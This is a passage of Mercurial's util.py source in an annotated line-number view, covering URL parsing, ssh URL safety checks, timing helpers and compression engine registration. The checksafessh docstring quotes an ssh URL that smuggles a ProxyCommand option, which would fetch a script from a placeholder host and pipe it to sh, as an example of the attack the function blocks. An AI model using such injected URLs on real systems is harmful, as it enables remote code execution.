2623 2652
2624 2653 def iterlines(iterator):
2625 2654 for chunk in iterator:
2626 2655 for line in chunk.splitlines():
2627 2656 yield line
2628 2657
2629 2658 def expandpath(path):
2630 2659 return os.path.expanduser(os.path.expandvars(path))
2631 2660
2632 2661 def hgcmd():
2633 2662 """Return the command used to execute current hg
2634 2663
2635 2664 This is different from hgexecutable() because on Windows we want
2636 2665 to avoid things opening new shell windows like batch files, so we
2637 2666 get either the python call or current executable.
2638 2667 """
2639 2668 if mainfrozen():
2640 2669 if getattr(sys, 'frozen', None) == 'macosx_app':
2641 2670 # Env variable set by py2app
2642 2671 return [encoding.environ['EXECUTABLEPATH']]
2643 2672 else:
2644 2673 return [pycompat.sysexecutable]
2645 2674 return gethgcmd()
2646 2675
2647 2676 def rundetached(args, condfn):
2648 2677 """Execute the argument list in a detached process.
2649 2678
2650 2679 condfn is a callable which is called repeatedly and should return
2651 2680 True once the child process is known to have started successfully.
2652 2681 At this point, the child process PID is returned. If the child
2653 2682 process fails to start or finishes before condfn() evaluates to
2654 2683 True, return -1.
2655 2684 """
2656 2685 # Windows case is easier because the child process is either
2657 2686 # successfully starting and validating the condition or exiting
2658 2687 # on failure. We just poll on its PID. On Unix, if the child
2659 2688 # process fails to start, it will be left in a zombie state until
2660 2689 # the parent wait on it, which we cannot do since we expect a long
2661 2690 # running process on success. Instead we listen for SIGCHLD telling
2662 2691 # us our child process terminated.
2663 2692 terminated = set()
2664 2693 def handler(signum, frame):
2665 2694 terminated.add(os.wait())
2666 2695 prevhandler = None
2667 2696 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2668 2697 if SIGCHLD is not None:
2669 2698 prevhandler = signal.signal(SIGCHLD, handler)
2670 2699 try:
2671 2700 pid = spawndetached(args)
2672 2701 while not condfn():
2673 2702 if ((pid in terminated or not testpid(pid))
2674 2703 and not condfn()):
2675 2704 return -1
2676 2705 time.sleep(0.1)
2677 2706 return pid
2678 2707 finally:
2679 2708 if prevhandler is not None:
2680 2709 signal.signal(signal.SIGCHLD, prevhandler)
2681 2710
2682 2711 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2683 2712 """Return the result of interpolating items in the mapping into string s.
2684 2713
2685 2714 prefix is a single character string, or a two character string with
2686 2715 a backslash as the first character if the prefix needs to be escaped in
2687 2716 a regular expression.
2688 2717
2689 2718 fn is an optional function that will be applied to the replacement text
2690 2719 just before replacement.
2691 2720
2692 2721 escape_prefix is an optional flag that allows using doubled prefix for
2693 2722 its escaping.
2694 2723 """
2695 2724 fn = fn or (lambda s: s)
2696 2725 patterns = '|'.join(mapping.keys())
2697 2726 if escape_prefix:
2698 2727 patterns += '|' + prefix
2699 2728 if len(prefix) > 1:
2700 2729 prefix_char = prefix[1:]
2701 2730 else:
2702 2731 prefix_char = prefix
2703 2732 mapping[prefix_char] = prefix_char
2704 2733 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2705 2734 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2706 2735
2707 2736 def getport(port):
2708 2737 """Return the port for a given network service.
2709 2738
2710 2739 If port is an integer, it's returned as is. If it's a string, it's
2711 2740 looked up using socket.getservbyname(). If there's no matching
2712 2741 service, error.Abort is raised.
2713 2742 """
2714 2743 try:
2715 2744 return int(port)
2716 2745 except ValueError:
2717 2746 pass
2718 2747
2719 2748 try:
2720 2749 return socket.getservbyname(pycompat.sysstr(port))
2721 2750 except socket.error:
2722 2751 raise Abort(_("no port number associated with service '%s'") % port)
2723 2752
2724 2753 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2725 2754 '0': False, 'no': False, 'false': False, 'off': False,
2726 2755 'never': False}
2727 2756
2728 2757 def parsebool(s):
2729 2758 """Parse s into a boolean.
2730 2759
2731 2760 If s is not a valid boolean, returns None.
2732 2761 """
2733 2762 return _booleans.get(s.lower(), None)
2734 2763
2735 2764 _hextochr = dict((a + b, chr(int(a + b, 16)))
2736 2765 for a in string.hexdigits for b in string.hexdigits)
2737 2766
2738 2767 class url(object):
2739 2768 r"""Reliable URL parser.
2740 2769
2741 2770 This parses URLs and provides attributes for the following
2742 2771 components:
2743 2772
2744 2773 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2745 2774
2746 2775 Missing components are set to None. The only exception is
2747 2776 fragment, which is set to '' if present but empty.
2748 2777
2749 2778 If parsefragment is False, fragment is included in query. If
2750 2779 parsequery is False, query is included in path. If both are
2751 2780 False, both fragment and query are included in path.
2752 2781
2753 2782 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2754 2783
2755 2784 Note that for backward compatibility reasons, bundle URLs do not
2756 2785 take host names. That means 'bundle://../' has a path of '../'.
2757 2786
2758 2787 Examples:
2759 2788
2760 2789 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2761 2790 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2762 2791 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2763 2792 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2764 2793 >>> url(b'file:///home/joe/repo')
2765 2794 <url scheme: 'file', path: '/home/joe/repo'>
2766 2795 >>> url(b'file:///c:/temp/foo/')
2767 2796 <url scheme: 'file', path: 'c:/temp/foo/'>
2768 2797 >>> url(b'bundle:foo')
2769 2798 <url scheme: 'bundle', path: 'foo'>
2770 2799 >>> url(b'bundle://../foo')
2771 2800 <url scheme: 'bundle', path: '../foo'>
2772 2801 >>> url(br'c:\foo\bar')
2773 2802 <url path: 'c:\\foo\\bar'>
2774 2803 >>> url(br'\\blah\blah\blah')
2775 2804 <url path: '\\\\blah\\blah\\blah'>
2776 2805 >>> url(br'\\blah\blah\blah#baz')
2777 2806 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2778 2807 >>> url(br'file:///C:\users\me')
2779 2808 <url scheme: 'file', path: 'C:\\users\\me'>
2780 2809
2781 2810 Authentication credentials:
2782 2811
2783 2812 >>> url(b'ssh://joe:xyz@x/repo')
2784 2813 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2785 2814 >>> url(b'ssh://joe@x/repo')
2786 2815 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2787 2816
2788 2817 Query strings and fragments:
2789 2818
2790 2819 >>> url(b'http://host/a?b#c')
2791 2820 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2792 2821 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2793 2822 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2794 2823
2795 2824 Empty path:
2796 2825
2797 2826 >>> url(b'')
2798 2827 <url path: ''>
2799 2828 >>> url(b'#a')
2800 2829 <url path: '', fragment: 'a'>
2801 2830 >>> url(b'http://host/')
2802 2831 <url scheme: 'http', host: 'host', path: ''>
2803 2832 >>> url(b'http://host/#a')
2804 2833 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2805 2834
2806 2835 Only scheme:
2807 2836
2808 2837 >>> url(b'http:')
2809 2838 <url scheme: 'http'>
2810 2839 """
2811 2840
2812 2841 _safechars = "!~*'()+"
2813 2842 _safepchars = "/!~*'()+:\\"
2814 2843 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2815 2844
2816 2845 def __init__(self, path, parsequery=True, parsefragment=True):
2817 2846 # We slowly chomp away at path until we have only the path left
2818 2847 self.scheme = self.user = self.passwd = self.host = None
2819 2848 self.port = self.path = self.query = self.fragment = None
2820 2849 self._localpath = True
2821 2850 self._hostport = ''
2822 2851 self._origpath = path
2823 2852
2824 2853 if parsefragment and '#' in path:
2825 2854 path, self.fragment = path.split('#', 1)
2826 2855
2827 2856 # special case for Windows drive letters and UNC paths
2828 2857 if hasdriveletter(path) or path.startswith('\\\\'):
2829 2858 self.path = path
2830 2859 return
2831 2860
2832 2861 # For compatibility reasons, we can't handle bundle paths as
2833 2862 # normal URLS
2834 2863 if path.startswith('bundle:'):
2835 2864 self.scheme = 'bundle'
2836 2865 path = path[7:]
2837 2866 if path.startswith('//'):
2838 2867 path = path[2:]
2839 2868 self.path = path
2840 2869 return
2841 2870
2842 2871 if self._matchscheme(path):
2843 2872 parts = path.split(':', 1)
2844 2873 if parts[0]:
2845 2874 self.scheme, path = parts
2846 2875 self._localpath = False
2847 2876
2848 2877 if not path:
2849 2878 path = None
2850 2879 if self._localpath:
2851 2880 self.path = ''
2852 2881 return
2853 2882 else:
2854 2883 if self._localpath:
2855 2884 self.path = path
2856 2885 return
2857 2886
2858 2887 if parsequery and '?' in path:
2859 2888 path, self.query = path.split('?', 1)
2860 2889 if not path:
2861 2890 path = None
2862 2891 if not self.query:
2863 2892 self.query = None
2864 2893
2865 2894 # // is required to specify a host/authority
2866 2895 if path and path.startswith('//'):
2867 2896 parts = path[2:].split('/', 1)
2868 2897 if len(parts) > 1:
2869 2898 self.host, path = parts
2870 2899 else:
2871 2900 self.host = parts[0]
2872 2901 path = None
2873 2902 if not self.host:
2874 2903 self.host = None
2875 2904 # path of file:///d is /d
2876 2905 # path of file:///d:/ is d:/, not /d:/
2877 2906 if path and not hasdriveletter(path):
2878 2907 path = '/' + path
2879 2908
2880 2909 if self.host and '@' in self.host:
2881 2910 self.user, self.host = self.host.rsplit('@', 1)
2882 2911 if ':' in self.user:
2883 2912 self.user, self.passwd = self.user.split(':', 1)
2884 2913 if not self.host:
2885 2914 self.host = None
2886 2915
2887 2916 # Don't split on colons in IPv6 addresses without ports
2888 2917 if (self.host and ':' in self.host and
2889 2918 not (self.host.startswith('[') and self.host.endswith(']'))):
2890 2919 self._hostport = self.host
2891 2920 self.host, self.port = self.host.rsplit(':', 1)
2892 2921 if not self.host:
2893 2922 self.host = None
2894 2923
2895 2924 if (self.host and self.scheme == 'file' and
2896 2925 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2897 2926 raise Abort(_('file:// URLs can only refer to localhost'))
2898 2927
2899 2928 self.path = path
2900 2929
2901 2930 # leave the query string escaped
2902 2931 for a in ('user', 'passwd', 'host', 'port',
2903 2932 'path', 'fragment'):
2904 2933 v = getattr(self, a)
2905 2934 if v is not None:
2906 2935 setattr(self, a, urlreq.unquote(v))
2907 2936
2908 2937 @encoding.strmethod
2909 2938 def __repr__(self):
2910 2939 attrs = []
2911 2940 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2912 2941 'query', 'fragment'):
2913 2942 v = getattr(self, a)
2914 2943 if v is not None:
2915 2944 attrs.append('%s: %r' % (a, v))
2916 2945 return '<url %s>' % ', '.join(attrs)
2917 2946
2918 2947 def __bytes__(self):
2919 2948 r"""Join the URL's components back into a URL string.
2920 2949
2921 2950 Examples:
2922 2951
2923 2952 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2924 2953 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2925 2954 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2926 2955 'http://user:pw@host:80/?foo=bar&baz=42'
2927 2956 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2928 2957 'http://user:pw@host:80/?foo=bar%3dbaz'
2929 2958 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2930 2959 'ssh://user:pw@[::1]:2200//home/joe#'
2931 2960 >>> bytes(url(b'http://localhost:80//'))
2932 2961 'http://localhost:80//'
2933 2962 >>> bytes(url(b'http://localhost:80/'))
2934 2963 'http://localhost:80/'
2935 2964 >>> bytes(url(b'http://localhost:80'))
2936 2965 'http://localhost:80/'
2937 2966 >>> bytes(url(b'bundle:foo'))
2938 2967 'bundle:foo'
2939 2968 >>> bytes(url(b'bundle://../foo'))
2940 2969 'bundle:../foo'
2941 2970 >>> bytes(url(b'path'))
2942 2971 'path'
2943 2972 >>> bytes(url(b'file:///tmp/foo/bar'))
2944 2973 'file:///tmp/foo/bar'
2945 2974 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2946 2975 'file:///c:/tmp/foo/bar'
2947 2976 >>> print(url(br'bundle:foo\bar'))
2948 2977 bundle:foo\bar
2949 2978 >>> print(url(br'file:///D:\data\hg'))
2950 2979 file:///D:\data\hg
2951 2980 """
2952 2981 if self._localpath:
2953 2982 s = self.path
2954 2983 if self.scheme == 'bundle':
2955 2984 s = 'bundle:' + s
2956 2985 if self.fragment:
2957 2986 s += '#' + self.fragment
2958 2987 return s
2959 2988
2960 2989 s = self.scheme + ':'
2961 2990 if self.user or self.passwd or self.host:
2962 2991 s += '//'
2963 2992 elif self.scheme and (not self.path or self.path.startswith('/')
2964 2993 or hasdriveletter(self.path)):
2965 2994 s += '//'
2966 2995 if hasdriveletter(self.path):
2967 2996 s += '/'
2968 2997 if self.user:
2969 2998 s += urlreq.quote(self.user, safe=self._safechars)
2970 2999 if self.passwd:
2971 3000 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2972 3001 if self.user or self.passwd:
2973 3002 s += '@'
2974 3003 if self.host:
2975 3004 if not (self.host.startswith('[') and self.host.endswith(']')):
2976 3005 s += urlreq.quote(self.host)
2977 3006 else:
2978 3007 s += self.host
2979 3008 if self.port:
2980 3009 s += ':' + urlreq.quote(self.port)
2981 3010 if self.host:
2982 3011 s += '/'
2983 3012 if self.path:
2984 3013 # TODO: similar to the query string, we should not unescape the
2985 3014 # path when we store it, the path might contain '%2f' = '/',
2986 3015 # which we should *not* escape.
2987 3016 s += urlreq.quote(self.path, safe=self._safepchars)
2988 3017 if self.query:
2989 3018 # we store the query in escaped form.
2990 3019 s += '?' + self.query
2991 3020 if self.fragment is not None:
2992 3021 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2993 3022 return s
2994 3023
2995 3024 __str__ = encoding.strmethod(__bytes__)
2996 3025
2997 3026 def authinfo(self):
2998 3027 user, passwd = self.user, self.passwd
2999 3028 try:
3000 3029 self.user, self.passwd = None, None
3001 3030 s = bytes(self)
3002 3031 finally:
3003 3032 self.user, self.passwd = user, passwd
3004 3033 if not self.user:
3005 3034 return (s, None)
3006 3035 # authinfo[1] is passed to urllib2 password manager, and its
3007 3036 # URIs must not contain credentials. The host is passed in the
3008 3037 # URIs list because Python < 2.4.3 uses only that to search for
3009 3038 # a password.
3010 3039 return (s, (None, (s, self.host),
3011 3040 self.user, self.passwd or ''))
3012 3041
3013 3042 def isabs(self):
3014 3043 if self.scheme and self.scheme != 'file':
3015 3044 return True # remote URL
3016 3045 if hasdriveletter(self.path):
3017 3046 return True # absolute for our purposes - can't be joined()
3018 3047 if self.path.startswith(br'\\'):
3019 3048 return True # Windows UNC path
3020 3049 if self.path.startswith('/'):
3021 3050 return True # POSIX-style
3022 3051 return False
3023 3052
3024 3053 def localpath(self):
3025 3054 if self.scheme == 'file' or self.scheme == 'bundle':
3026 3055 path = self.path or '/'
3027 3056 # For Windows, we need to promote hosts containing drive
3028 3057 # letters to paths with drive letters.
3029 3058 if hasdriveletter(self._hostport):
3030 3059 path = self._hostport + '/' + self.path
3031 3060 elif (self.host is not None and self.path
3032 3061 and not hasdriveletter(path)):
3033 3062 path = '/' + path
3034 3063 return path
3035 3064 return self._origpath
3036 3065
3037 3066 def islocal(self):
3038 3067 '''whether localpath will return something that posixfile can open'''
3039 3068 return (not self.scheme or self.scheme == 'file'
3040 3069 or self.scheme == 'bundle')
3041 3070
3042 3071 def hasscheme(path):
3043 3072 return bool(url(path).scheme)
3044 3073
3045 3074 def hasdriveletter(path):
3046 3075 return path and path[1:2] == ':' and path[0:1].isalpha()
3047 3076
3048 3077 def urllocalpath(path):
3049 3078 return url(path, parsequery=False, parsefragment=False).localpath()
3050 3079
3051 3080 def checksafessh(path):
3052 3081 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3053 3082
3054 3083 This is a sanity check for ssh urls. ssh will parse the first item as
3055 3084 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3056 3085 Let's prevent these potentially exploited urls entirely and warn the
3057 3086 user.
3058 3087
3059 3088 Raises an error.Abort when the url is unsafe.
3060 3089 """
3061 3090 path = urlreq.unquote(path)
3062 3091 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3063 3092 raise error.Abort(_('potentially unsafe url: %r') %
3064 3093 (path,))
3065 3094
3066 3095 def hidepassword(u):
3067 3096 '''hide user credential in a url string'''
3068 3097 u = url(u)
3069 3098 if u.passwd:
3070 3099 u.passwd = '***'
3071 3100 return bytes(u)
3072 3101
3073 3102 def removeauth(u):
3074 3103 '''remove all authentication information from a url string'''
3075 3104 u = url(u)
3076 3105 u.user = u.passwd = None
3077 3106 return str(u)
3078 3107
3079 3108 timecount = unitcountfn(
3080 3109 (1, 1e3, _('%.0f s')),
3081 3110 (100, 1, _('%.1f s')),
3082 3111 (10, 1, _('%.2f s')),
3083 3112 (1, 1, _('%.3f s')),
3084 3113 (100, 0.001, _('%.1f ms')),
3085 3114 (10, 0.001, _('%.2f ms')),
3086 3115 (1, 0.001, _('%.3f ms')),
3087 3116 (100, 0.000001, _('%.1f us')),
3088 3117 (10, 0.000001, _('%.2f us')),
3089 3118 (1, 0.000001, _('%.3f us')),
3090 3119 (100, 0.000000001, _('%.1f ns')),
3091 3120 (10, 0.000000001, _('%.2f ns')),
3092 3121 (1, 0.000000001, _('%.3f ns')),
3093 3122 )
3094 3123
3095 3124 _timenesting = [0]
3096 3125
3097 3126 def timed(func):
3098 3127 '''Report the execution time of a function call to stderr.
3099 3128
3100 3129 During development, use as a decorator when you need to measure
3101 3130 the cost of a function, e.g. as follows:
3102 3131
3103 3132 @util.timed
3104 3133 def foo(a, b, c):
3105 3134 pass
3106 3135 '''
3107 3136
3108 3137 def wrapper(*args, **kwargs):
3109 3138 start = timer()
3110 3139 indent = 2
3111 3140 _timenesting[0] += indent
3112 3141 try:
3113 3142 return func(*args, **kwargs)
3114 3143 finally:
3115 3144 elapsed = timer() - start
3116 3145 _timenesting[0] -= indent
3117 3146 stderr.write('%s%s: %s\n' %
3118 3147 (' ' * _timenesting[0], func.__name__,
3119 3148 timecount(elapsed)))
3120 3149 return wrapper
3121 3150
3122 3151 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3123 3152 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3124 3153
3125 3154 def sizetoint(s):
3126 3155 '''Convert a space specifier to a byte count.
3127 3156
3128 3157 >>> sizetoint(b'30')
3129 3158 30
3130 3159 >>> sizetoint(b'2.2kb')
3131 3160 2252
3132 3161 >>> sizetoint(b'6M')
3133 3162 6291456
3134 3163 '''
3135 3164 t = s.strip().lower()
3136 3165 try:
3137 3166 for k, u in _sizeunits:
3138 3167 if t.endswith(k):
3139 3168 return int(float(t[:-len(k)]) * u)
3140 3169 return int(t)
3141 3170 except ValueError:
3142 3171 raise error.ParseError(_("couldn't parse size: %s") % s)
3143 3172
3144 3173 class hooks(object):
3145 3174 '''A collection of hook functions that can be used to extend a
3146 3175 function's behavior. Hooks are called in lexicographic order,
3147 3176 based on the names of their sources.'''
3148 3177
3149 3178 def __init__(self):
3150 3179 self._hooks = []
3151 3180
3152 3181 def add(self, source, hook):
3153 3182 self._hooks.append((source, hook))
3154 3183
3155 3184 def __call__(self, *args):
3156 3185 self._hooks.sort(key=lambda x: x[0])
3157 3186 results = []
3158 3187 for source, hook in self._hooks:
3159 3188 results.append(hook(*args))
3160 3189 return results
3161 3190
3162 3191 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3163 3192 '''Yields lines for a nicely formatted stacktrace.
3164 3193 Skips the 'skip' last entries, then return the last 'depth' entries.
3165 3194 Each file+linenumber is formatted according to fileline.
3166 3195 Each line is formatted according to line.
3167 3196 If line is None, it yields:
3168 3197 length of longest filepath+line number,
3169 3198 filepath+linenumber,
3170 3199 function
3171 3200
3172 3201 Not be used in production code but very convenient while developing.
3173 3202 '''
3174 3203 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3175 3204 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3176 3205 ][-depth:]
3177 3206 if entries:
3178 3207 fnmax = max(len(entry[0]) for entry in entries)
3179 3208 for fnln, func in entries:
3180 3209 if line is None:
3181 3210 yield (fnmax, fnln, func)
3182 3211 else:
3183 3212 yield line % (fnmax, fnln, func)
3184 3213
3185 3214 def debugstacktrace(msg='stacktrace', skip=0,
3186 3215 f=stderr, otherf=stdout, depth=0):
3187 3216 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3188 3217 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3189 3218 By default it will flush stdout first.
3190 3219 It can be used everywhere and intentionally does not require an ui object.
3191 3220 Not be used in production code but very convenient while developing.
3192 3221 '''
3193 3222 if otherf:
3194 3223 otherf.flush()
3195 3224 f.write('%s at:\n' % msg.rstrip())
3196 3225 for line in getstackframes(skip + 1, depth=depth):
3197 3226 f.write(line)
3198 3227 f.flush()
3199 3228
3200 3229 class dirs(object):
3201 3230 '''a multiset of directory names from a dirstate or manifest'''
3202 3231
3203 3232 def __init__(self, map, skip=None):
3204 3233 self._dirs = {}
3205 3234 addpath = self.addpath
3206 3235 if safehasattr(map, 'iteritems') and skip is not None:
3207 3236 for f, s in map.iteritems():
3208 3237 if s[0] != skip:
3209 3238 addpath(f)
3210 3239 else:
3211 3240 for f in map:
3212 3241 addpath(f)
3213 3242
3214 3243 def addpath(self, path):
3215 3244 dirs = self._dirs
3216 3245 for base in finddirs(path):
3217 3246 if base in dirs:
3218 3247 dirs[base] += 1
3219 3248 return
3220 3249 dirs[base] = 1
3221 3250
3222 3251 def delpath(self, path):
3223 3252 dirs = self._dirs
3224 3253 for base in finddirs(path):
3225 3254 if dirs[base] > 1:
3226 3255 dirs[base] -= 1
3227 3256 return
3228 3257 del dirs[base]
3229 3258
3230 3259 def __iter__(self):
3231 3260 return iter(self._dirs)
3232 3261
3233 3262 def __contains__(self, d):
3234 3263 return d in self._dirs
3235 3264
3236 3265 if safehasattr(parsers, 'dirs'):
3237 3266 dirs = parsers.dirs
3238 3267
3239 3268 def finddirs(path):
3240 3269 pos = path.rfind('/')
3241 3270 while pos != -1:
3242 3271 yield path[:pos]
3243 3272 pos = path.rfind('/', 0, pos)
3244 3273
3245 3274 # compression code
3246 3275
3247 3276 SERVERROLE = 'server'
3248 3277 CLIENTROLE = 'client'
3249 3278
3250 3279 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3251 3280 (u'name', u'serverpriority',
3252 3281 u'clientpriority'))
3253 3282
3254 3283 class compressormanager(object):
3255 3284 """Holds registrations of various compression engines.
3256 3285
3257 3286 This class essentially abstracts the differences between compression
3258 3287 engines to allow new compression formats to be added easily, possibly from
3259 3288 extensions.
3260 3289
3261 3290 Compressors are registered against the global instance by calling its
3262 3291 ``register()`` method.
3263 3292 """
3264 3293 def __init__(self):
3265 3294 self._engines = {}
3266 3295 # Bundle spec human name to engine name.
3267 3296 self._bundlenames = {}
3268 3297 # Internal bundle identifier to engine name.
3269 3298 self._bundletypes = {}
3270 3299 # Revlog header to engine name.
3271 3300 self._revlogheaders = {}
3272 3301 # Wire proto identifier to engine name.
3273 3302 self._wiretypes = {}
3274 3303
3275 3304 def __getitem__(self, key):
3276 3305 return self._engines[key]
3277 3306
3278 3307 def __contains__(self, key):
3279 3308 return key in self._engines
3280 3309
3281 3310 def __iter__(self):
3282 3311 return iter(self._engines.keys())
3283 3312
3284 3313 def register(self, engine):
3285 3314 """Register a compression engine with the manager.
3286 3315
3287 3316 The argument must be a ``compressionengine`` instance.
3288 3317 """
3289 3318 if not isinstance(engine, compressionengine):
3290 3319 raise ValueError(_('argument must be a compressionengine'))
3291 3320
3292 3321 name = engine.name()
3293 3322
3294 3323 if name in self._engines:
3295 3324 raise error.Abort(_('compression engine %s already registered') %
3296 3325 name)
3297 3326
3298 3327 bundleinfo = engine.bundletype()
3299 3328 if bundleinfo:
3300 3329 bundlename, bundletype = bundleinfo
3301 3330
3302 3331 if bundlename in self._bundlenames:
3303 3332 raise error.Abort(_('bundle name %s already registered') %
3304 3333 bundlename)
3305 3334 if bundletype in self._bundletypes:
3306 3335 raise error.Abort(_('bundle type %s already registered by %s') %
3307 3336 (bundletype, self._bundletypes[bundletype]))
3308 3337
3309 3338 # No external facing name declared.
3310 3339 if bundlename:
3311 3340 self._bundlenames[bundlename] = name
3312 3341
3313 3342 self._bundletypes[bundletype] = name
3314 3343
3315 3344 wiresupport = engine.wireprotosupport()
3316 3345 if wiresupport:
3317 3346 wiretype = wiresupport.name
3318 3347 if wiretype in self._wiretypes:
3319 3348 raise error.Abort(_('wire protocol compression %s already '
3320 3349 'registered by %s') %
3321 3350 (wiretype, self._wiretypes[wiretype]))
3322 3351
3323 3352 self._wiretypes[wiretype] = name
3324 3353
3325 3354 revlogheader = engine.revlogheader()
3326 3355 if revlogheader and revlogheader in self._revlogheaders:
3327 3356 raise error.Abort(_('revlog header %s already registered by %s') %
3328 3357 (revlogheader, self._revlogheaders[revlogheader]))
3329 3358
3330 3359 if revlogheader:
3331 3360 self._revlogheaders[revlogheader] = name
3332 3361
3333 3362 self._engines[name] = engine
3334 3363
3335 3364 @property
3336 3365 def supportedbundlenames(self):
3337 3366 return set(self._bundlenames.keys())
3338 3367
3339 3368 @property
3340 3369 def supportedbundletypes(self):
3341 3370 return set(self._bundletypes.keys())
3342 3371
3343 3372 def forbundlename(self, bundlename):
3344 3373 """Obtain a compression engine registered to a bundle name.
3345 3374
3346 3375 Will raise KeyError if the bundle type isn't registered.
3347 3376
3348 3377 Will abort if the engine is known but not available.
3349 3378 """
3350 3379 engine = self._engines[self._bundlenames[bundlename]]
3351 3380 if not engine.available():
3352 3381 raise error.Abort(_('compression engine %s could not be loaded') %
3353 3382 engine.name())
3354 3383 return engine
3355 3384
3356 3385 def forbundletype(self, bundletype):
3357 3386 """Obtain a compression engine registered to a bundle type.
3358 3387
3359 3388 Will raise KeyError if the bundle type isn't registered.
3360 3389
3361 3390 Will abort if the engine is known but not available.
3362 3391 """
3363 3392 engine = self._engines[self._bundletypes[bundletype]]
3364 3393 if not engine.available():
3365 3394 raise error.Abort(_('compression engine %s could not be loaded') %
3366 3395 engine.name())
3367 3396 return engine
3368 3397
3369 3398 def supportedwireengines(self, role, onlyavailable=True):
3370 3399 """Obtain compression engines that support the wire protocol.
3371 3400
3372 3401 Returns a list of engines in prioritized order, most desired first.
3373 3402
3374 3403 If ``onlyavailable`` is set, filter out engines that can't be
3375 3404 loaded.
3376 3405 """
3377 3406 assert role in (SERVERROLE, CLIENTROLE)
3378 3407
3379 3408 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3380 3409
3381 3410 engines = [self._engines[e] for e in self._wiretypes.values()]
3382 3411 if onlyavailable:
3383 3412 engines = [e for e in engines if e.available()]
3384 3413
3385 3414 def getkey(e):
3386 3415 # Sort first by priority, highest first. In case of tie, sort
3387 3416 # alphabetically. This is arbitrary, but ensures output is
3388 3417 # stable.
3389 3418 w = e.wireprotosupport()
3390 3419 return -1 * getattr(w, attr), w.name
3391 3420
3392 3421 return list(sorted(engines, key=getkey))
3393 3422
3394 3423 def forwiretype(self, wiretype):
3395 3424 engine = self._engines[self._wiretypes[wiretype]]
3396 3425 if not engine.available():
3397 3426 raise error.Abort(_('compression engine %s could not be loaded') %
3398 3427 engine.name())
3399 3428 return engine
3400 3429
3401 3430 def forrevlogheader(self, header):
3402 3431 """Obtain a compression engine registered to a revlog header.
3403 3432
3404 3433 Will raise KeyError if the revlog header value isn't registered.
3405 3434 """
3406 3435 return self._engines[self._revlogheaders[header]]
3407 3436
3408 3437 compengines = compressormanager()
3409 3438
3410 3439 class compressionengine(object):
3411 3440 """Base class for compression engines.
3412 3441
3413 3442 Compression engines must implement the interface defined by this class.
3414 3443 """
3415 3444 def name(self):
3416 3445 """Returns the name of the compression engine.
3417 3446
3418 3447 This is the key the engine is registered under.
3419 3448
3420 3449 This method must be implemented.
3421 3450 """
3422 3451 raise NotImplementedError()
3423 3452
3424 3453 def available(self):
3425 3454 """Whether the compression engine is available.
3426 3455
3427 3456 The intent of this method is to allow optional compression engines
3428 3457 that may not be available in all installations (such as engines relying
3429 3458 on C extensions that may not be present).
3430 3459 """
3431 3460 return True
3432 3461
3433 3462 def bundletype(self):
3434 3463 """Describes bundle identifiers for this engine.
3435 3464
3436 3465 If this compression engine isn't supported for bundles, returns None.
3437 3466
3438 3467 If this engine can be used for bundles, returns a 2-tuple of strings of
3439 3468 the user-facing "bundle spec" compression name and an internal
3440 3469 identifier used to denote the compression format within bundles. To
3441 3470 exclude the name from external usage, set the first element to ``None``.
3442 3471
3443 3472 If bundle compression is supported, the class must also implement
3444 3473 ``compressstream`` and `decompressorreader``.
3445 3474
3446 3475 The docstring of this method is used in the help system to tell users
3447 3476 about this engine.
3448 3477 """
3449 3478 return None
3450 3479
3451 3480 def wireprotosupport(self):
3452 3481 """Declare support for this compression format on the wire protocol.
3453 3482
3454 3483 If this compression engine isn't supported for compressing wire
3455 3484 protocol payloads, returns None.
3456 3485
3457 3486 Otherwise, returns ``compenginewireprotosupport`` with the following
3458 3487 fields:
3459 3488
3460 3489 * String format identifier
3461 3490 * Integer priority for the server
3462 3491 * Integer priority for the client
3463 3492
3464 3493 The integer priorities are used to order the advertisement of format
3465 3494 support by server and client. The highest integer is advertised
3466 3495 first. Integers with non-positive values aren't advertised.
3467 3496
3468 3497 The priority values are somewhat arbitrary and only used for default
3469 3498 ordering. The relative order can be changed via config options.
3470 3499
3471 3500 If wire protocol compression is supported, the class must also implement
3472 3501 ``compressstream`` and ``decompressorreader``.
3473 3502 """
